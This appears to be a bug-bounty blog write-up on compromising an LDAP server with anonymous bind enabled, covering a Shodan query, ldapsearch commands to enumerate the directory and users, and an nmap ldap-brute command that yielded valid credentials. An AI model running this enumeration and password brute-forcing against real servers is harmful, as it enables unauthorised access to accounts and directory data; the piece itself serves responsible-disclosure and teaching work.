How to Takover a ldap server.

Intro

LDAP (Lightweight Directory Access Protocol) is a software protocol for enabling anyone to locate organizations, individuals, and other resources such as files and devices in a network, whether on the public Internet or on a corporate intranet. — read here

I Chose a random paying target REDACTED.com running a Responsible Disclosure.

As Usual i started my personal tool “BREXET” and it gathered lots of subdomains and ran nmap over every subdomain , i went through the output and found this interesting port 389 with anonymous bind enabled.

can be found using shodan , use shodan query — ssl:target Port:”389"

Anonymous LDAP Binding allows a client to connect and search the directory (bind and search) without logging in. You do not need to include binddn and bindpasswd.

Now, we can try searching for the base by using a ldap search query.

ldapsearch -h <TARGET IP> 389 -x -s base -b ‘’ “(objectClass=*)” “*” +

Image for post
Image for post
this is just small glimpse how it would look like.

now , take a note of naming context/base ,with this we can enum ldap users and their access details and uids , etc

defaultnamingcontext: dc=xxx,dc=xxx,dc=xx

we are gonna use this command.

ldapsearch -h <TARGET IP> -p 389 -x -b “dc=xxx,dc=xxx,dc=xx”

Image for post
Image for post

now there were lots of users and here’s how their ldap detail look like

# aab, users, compat, doman_name
dn: uid=aab,cn=users,cn=compat,dc=xxx,dc=xxx,dc=xx
objectClass: posixAccount
objectClass: ipaOverrideTarget
objectClass: top
gecos: name_here
cn: name_here
uidNumber: 1019XXXXXXX
gidNumber: 1019XXXXXXX
loginShell: /bin/bash
homeDirectory: /home/aab
ipaAnchorUUID:: xxxxxxxxx
uid: aab

now with this as a attacker i can try bruteforcing passwords or can check for usernames and password with a default list using nmap

nmap -p 389 — script ldap-brute — script-args ldap.base=’”dc=xxx,dc=xxxx,dc=xx”’ <target ip>

#Note: You can use jxplorer to do the same , just connect to the port using it .

#Note: do nmap scan on all subs if the target scope is big.

with this i got lucky and got a ldap user cred (thanks to nmap)

once you get access use jxplorer to play around .

after reporting it , i earned good bounty.

Image for post
Image for post

#if you have any question just DM on my twitter.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store